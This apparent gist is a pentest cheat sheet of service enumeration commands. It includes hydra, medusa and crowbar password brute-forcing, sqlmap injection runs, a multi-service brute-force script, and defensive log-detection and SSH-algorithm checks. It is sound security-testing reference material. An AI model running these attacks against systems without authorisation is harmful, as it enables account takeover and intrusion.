@aw-junaid
Created January 30, 2026 18:14

Network Service Enumeration & Security Testing Commands

Comprehensive guide to network service testing including SSH, HTTP, FTP, SMTP, DNS, database, and remote desktop protocols. Commands for connection, scanning, enumeration, and security assessment across common ports and services.


SSH (Port 22)

Connect to SSH service:

ssh <target>
ssh -p 2222 <target>                 # Non-standard port
ssh -i private_key.pem user@<target> # With key authentication

Scan for SSH port:

nmap -p 22 <target>
nmap -p 22 --script ssh2-enum-algos <target> # Check algorithms
nmap -p 22 --script ssh-hostkey <target>     # Get host key

Brute force SSH login:

hydra -L users.txt -P passwords.txt ssh://<target>
hydra -l admin -P rockyou.txt ssh://<target>:2222
medusa -h <target> -U users.txt -P passwords.txt -M ssh

SSH-specific security checks:

ssh-audit <target>:22                     # SSH configuration audit
nmap -p 22 --script ssh-auth-methods <target> # Authentication methods
ssh -oKexAlgorithms=diffie-hellman-group1-sha1 <target> # Legacy test
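
The algorithm lists printed by `ssh2-enum-algos` can be checked against a deny-list instead of being read by eye. The following is an added example, not part of the original gist; the weak-algorithm list and the sample scan output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag legacy algorithms in the output of
#   nmap -p 22 --script ssh2-enum-algos <target>
# WEAK_ALGOS is an assumed deny-list; align it with your own policy.
WEAK_ALGOS='diffie-hellman-group1-sha1 diffie-hellman-group-exchange-sha1 ssh-dss 3des-cbc arcfour arcfour128 arcfour256 hmac-md5 hmac-md5-96 hmac-sha1-96'

# Reads ssh2-enum-algos output on stdin.
# Prints "category algorithm" for every offered algorithm on the deny-list.
flag_weak_ssh_algos() {
    awk -v weak="$WEAK_ALGOS" '
        BEGIN { n = split(weak, w, " "); for (i = 1; i <= n; i++) bad[w[i]] = 1 }
        { sub(/^[|][ _]*/, "") }                    # strip the NSE "|" / "|_" prefix
        /^[a-z_]+: \([0-9]+\)$/ {                   # e.g. "kex_algorithms: (3)"
            cat = $1; sub(/:$/, "", cat); next
        }
        cat != "" && NF == 1 && ($1 in bad) { print cat, $1 }
    '
}

sample_nmap_output() {   # constructed sample, not captured from a real host
    cat <<'EOF'
PORT   STATE SERVICE
22/tcp open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (3)
|       curve25519-sha256
|       diffie-hellman-group14-sha256
|       diffie-hellman-group1-sha1
|   server_host_key_algorithms: (2)
|       ssh-ed25519
|       ssh-dss
|   encryption_algorithms: (2)
|       aes256-gcm@openssh.com
|       3des-cbc
|   mac_algorithms: (2)
|       hmac-sha2-256
|_      hmac-md5
EOF
}

sample_nmap_output | flag_weak_ssh_algos
```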

HTTP (Port 80)

Retrieve web content:

curl http://<target>
curl -I http://<target>                  # Headers only
curl -v http://<target>                  # Verbose output
curl -L http://<target>                  # Follow redirects

Scan HTTP port:

nmap -p 80 <target>
nmap -p 80 --script http-enum <target>   # Enumeration
nmap -p 80 --script http-headers <target> # Check headers

Directory enumeration:

dirb http://<target>
dirb http://<target> /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://<target>/FUZZ -w wordlist.txt

Additional HTTP tools:

nikto -h http://<target>                 # Vulnerability scanner
whatweb <target>                         # Technology detection
nmap -p 80 --script http-methods <target> # HTTP methods check

HTTPS (Port 443)

Retrieve secure content:

curl https://<target>
curl -k https://<target>                 # Ignore certificate errors
curl --cert client.crt --key client.key https://<target> # With client cert

Scan HTTPS port:

nmap -p 443 <target>
nmap -p 443 --script ssl-enum-ciphers <target> # Cipher enumeration
nmap -p 443 --script http-title <target>      # Get page title

SSL/TLS vulnerability scan:

sslscan <target>:443
testssl.sh <target>:443
nmap -p 443 --script ssl-heartbleed <target> # Heartbleed check
openssl s_client -connect <target>:443 -tlsextdebug 2>&1 | grep "TLS"

Certificate inspection:

openssl s_client -connect <target>:443 -showcerts
nmap -p 443 --script ssl-cert <target>  # Certificate details
sslyze --regular <target>:443

FTP (Port 21)

Connect to FTP service:

ftp <target>
ftp -p <target>                         # Passive mode
ftp -i <target>                         # Turn off interactive prompting

Scan FTP port:

nmap -p 21 <target>
nmap -p 21 --script ftp-anon <target>   # Check anonymous login
nmap -p 21 --script ftp-syst <target>   # Get system info

Brute force FTP login:

hydra -l <username> -P passwords.txt ftp://<target>
hydra -L users.txt -P passwords.txt ftp://<target>
ncrack -p 21 -U users.txt -P passwords.txt <target>

FTP security checks:

nmap -p 21 --script ftp-brute <target>  # Built-in brute force
nmap -p 21 --script ftp-vsftpd-backdoor <target> # Backdoor check
ftp -n <target> 21 << EOF               # Automated anonymous login check (-n disables auto-login)
user anonymous anonymous@
quit
EOF

SMTP (Port 25)

Connect to SMTP service:

telnet <target> 25
nc <target> 25
openssl s_client -connect <target>:25 -starttls smtp # TLS

Scan SMTP port:

nmap -p 25 <target>
nmap -p 25 --script smtp-commands <target> # List commands
nmap -p 25 --script smtp-open-relay <target> # Open relay test

Enumerate valid users:

smtp-user-enum -M VRFY -U users.txt -t <target>
smtp-user-enum -M EXPN -U users.txt -t <target>
nmap -p 25 --script smtp-enum-users <target> # Built-in enumeration

SMTP testing commands:

# Manual enumeration via telnet:
EHLO example.com
VRFY root
EXPN admin
MAIL FROM: test@example.com
RCPT TO: user@domain.com

DNS (Port 53)

DNS lookup:

nslookup <target>
dig <target>
dig @<dns_server> <target>              # Specify DNS server

Scan DNS port:

nmap -p 53 <target>
nmap -p 53 --script dns-nsid <target>   # Get nameserver ID
nmap -p 53 --script dns-recursion <target> # Recursion check

DNS enumeration:

dnsrecon -d <target>
dnsrecon -d <target> -t axfr            # Zone transfer
dnsenum <target>
host -l <target> <dns_server>           # List domain

Advanced DNS queries:

dig ANY <target>                        # All records (many servers give a minimal answer, RFC 8482)
dig TXT <target>                        # Text records
dig MX <target>                         # Mail exchange
dig NS <target>                         # Nameservers
dig -x <ip_address>                     # Reverse lookup

POP3 (Port 110)

Connect to POP3 service:

telnet <target> 110
openssl s_client -connect <target>:995 -quiet # POP3S (SSL)

Scan POP3 port:

nmap -p 110 <target>
nmap -p 110 --script pop3-capabilities <target> # Capabilities
nmap -p 995 --script ssl-enum-ciphers <target> # SSL version

Brute force POP3 login:

hydra -l <username> -P passwords.txt pop3://<target>
hydra -S -l <username> -P passwords.txt pop3s://<target> # SSL version

POP3 command examples:

# Manual testing:
USER username
PASS password
LIST
RETR 1
DELE 1
QUIT

IMAP (Port 143)

Connect to IMAP service:

telnet <target> 143
openssl s_client -connect <target>:993 -quiet # IMAPS

Scan IMAP port:

nmap -p 143 <target>
nmap -p 143 --script imap-capabilities <target>
nmap -p 993 --script ssl-cert <target>  # Check certificate

Brute force IMAP login:

hydra -l <username> -P passwords.txt imap://<target>
hydra -S -l <username> -P passwords.txt imaps://<target>

IMAP testing:

# Manual commands:
A01 LOGIN username password
A02 LIST "" "*"
A03 SELECT INBOX
A04 FETCH 1 BODY[]
A05 LOGOUT

MySQL (Port 3306)

Connect to MySQL service:

mysql -h <target> -u <username> -p
mysql -h <target> -u root --password=''
mysql -h <target> -u root -p'password'  # Inline password

Scan MySQL port:

nmap -p 3306 <target>
nmap -p 3306 --script mysql-info <target>
nmap -p 3306 --script mysql-empty-password <target>

SQL injection testing:

sqlmap -u "http://<target>/index.php?id=1" --dbs
sqlmap -u "http://<target>/login.php" --data="user=admin&pass=test" --dbs
sqlmap -u "http://<target>/" --crawl=2 --batch --dbs

MySQL enumeration:

nmap -p 3306 --script mysql-users <target> # User enumeration
nmap -p 3306 --script mysql-variables <target> # Configuration
mysql -h <target> -u root -e "SHOW DATABASES;" # List databases

RDP (Port 3389)

Connect to RDP service:

rdesktop <target>
xfreerdp /v:<target>
xfreerdp /v:<target> +clipboard /drive:shared,/tmp

Scan RDP port:

nmap -p 3389 <target>
nmap -p 3389 --script rdp-enum-encryption <target>
nmap -p 3389 --script rdp-ntlm-info <target>

Brute force RDP login:

crowbar -b rdp -s <target>/32 -U users.txt -C passwords.txt # -U takes a user list file, -u a single name
hydra -t 1 -V -f -L users.txt -P passwords.txt rdp://<target>
ncrack -p 3389 --user admin -P passwords.txt <target>

RDP security checks:

nmap -p 3389 --script rdp-vuln-ms12-020 <target> # MS12-020 check (not BlueKeep, CVE-2019-0708)
sslscan <target>:3389                    # Check encryption
rdp-sec-check <target>                  # Security settings

VNC (Port 5900+)

Connect to VNC service:

vncviewer <target>
vncviewer <target>::5901                # Specific port (5901 = display :1)
xtightvncviewer <target>

Scan VNC port:

nmap -p 5900 <target>
nmap -p 5900-5910 <target>              # Multiple VNC ports
nmap -p 5900 --script vnc-info <target>
nmap -p 5900 --script realvnc-auth-bypass <target>

VNC brute force:

hydra -P passwords.txt -t 1 -f vnc://<target>
medusa -h <target> -u root -P passwords.txt -M vnc
patator vnc_login host=<target> password=FILE0 0=passwords.txt

VNC security assessment:

nmap -p 5900 --script vnc-title <target> # Get screen title
vncrack -h <target> -P passwords.txt    # Password cracker
# Check for authentication bypass

Additional Critical Services & Ports

SMB (Port 445):

smbclient -L //<target>/
nmap -p 445 --script smb-enum-shares <target>
enum4linux <target>

SNMP (Port 161):

snmpwalk -c public -v1 <target>
nmap -p 161 --script snmp-info <target>
onesixtyone -c community.txt <target>

Telnet (Port 23):

telnet <target>
nmap -p 23 --script telnet-ntlm-info <target>
hydra -l root -P passwords.txt telnet://<target>

NetBIOS (Port 139):

nbtscan <target>/24
nmap -sU -p 137 --script nbstat <target>
nmblookup -A <target>

LDAP (Port 389):

ldapsearch -H ldap://<target> -x -b "dc=example,dc=com"
nmap -p 389 --script ldap-rootdse <target>

RPC (Port 135):

rpcclient -U "" <target>
nmap -p 135 --script rpc-grind <target>

Automation Scripts for Multiple Services

Quick service scan:

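#!/bin/bash
# Report which common service ports accept a TCP connection.
TARGET=${1:?usage: $0 <target>}
echo "Scanning common services on $TARGET"
for PORT in 21 22 23 25 53 80 110 143 443 445 3306 3389 5900; do
    echo -n "Port $PORT: "
    # -z: connect without sending data; CLOSED also covers filtered ports and timeouts
    timeout 2 nc -z "$TARGET" "$PORT" 2>/dev/null && echo "OPEN" || echo "CLOSED"
done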

Multi-service brute force:

#!/bin/bash
TARGET=${1:?usage: $0 <target>}
USERLIST="users.txt"
PASSLIST="passwords.txt"

# SSH
hydra -L "$USERLIST" -P "$PASSLIST" "ssh://$TARGET" -o ssh_results.txt

# FTP
hydra -L "$USERLIST" -P "$PASSLIST" "ftp://$TARGET" -o ftp_results.txt

# RDP (if crowbar available); crowbar takes the server in CIDR form and a user list with -U
crowbar -b rdp -s "$TARGET/32" -U "$USERLIST" -C "$PASSLIST" -o rdp_results.txt
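
On the defending side, the hydra and medusa runs against SSH show up in the sshd log as bursts of `Failed password` lines from one source. The following is an added example, not part of the original gist, that counts them per source IP; the log lines are constructed and the default threshold of 5 is an assumption.

```shell
#!/bin/sh
# Added example: per-source count of failed SSH password logins.
# Usage: detect_ssh_bruteforce [THRESHOLD] < auth.log   (default 5, an assumption)
# Output: "source_ip failures distinct_usernames" for each source at or over the threshold.
detect_ssh_bruteforce() {
    awk -v min="${1:-5}" '
        # Matches "Failed password for [invalid user] USER from IP port N ssh2".
        # Fields are read from the END of the line because USER is attacker-supplied.
        /sshd\[[0-9]+\]: Failed password for / && $(NF-4) == "from" && $(NF-2) == "port" {
            ip = $(NF-3); user = $(NF-5)
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END { for (ip in fails) if (fails[ip] >= min) print ip, fails[ip], users[ip] }
    ' | sort
}

sample_auth_log() {   # constructed log lines using documentation address ranges
    cat <<'EOF'
Jan 30 18:14:01 srv01 sshd[2101]: Failed password for root from 203.0.113.7 port 40001 ssh2
Jan 30 18:14:01 srv01 sshd[2102]: Failed password for root from 203.0.113.7 port 40002 ssh2
Jan 30 18:14:02 srv01 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40003 ssh2
Jan 30 18:14:02 srv01 sshd[2104]: Failed password for invalid user admin from 203.0.113.7 port 40004 ssh2
Jan 30 18:14:03 srv01 sshd[2105]: Failed password for invalid user from from 203.0.113.7 port 40005 ssh2
Jan 30 18:14:03 srv01 sshd[2106]: Failed password for invalid user oracle from 203.0.113.7 port 40006 ssh2
Jan 30 18:20:10 srv01 sshd[2150]: Failed password for alice from 198.51.100.23 port 51822 ssh2
Jan 30 18:20:15 srv01 sshd[2150]: Accepted password for alice from 198.51.100.23 port 51822 ssh2
EOF
}

sample_auth_log | detect_ssh_bruteforce 5    # prints: 203.0.113.7 6 4
```

A high failure count spread over several usernames, as in the sample, is the pattern a user-list and password-list run produces; a single mistyped password stays below the threshold.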

Service banner grabbing:

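#!/bin/bash
TARGET=${1:?usage: $0 <target>}
for PORT in 21 22 25 80 110 143 443; do
    echo "=== Port $PORT ==="
    # An empty line gets no banner from 80 or 443: HTTP waits for a request, 443 for a TLS handshake
    echo "" | nc -w 2 "$TARGET" "$PORT"
    echo ""
done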
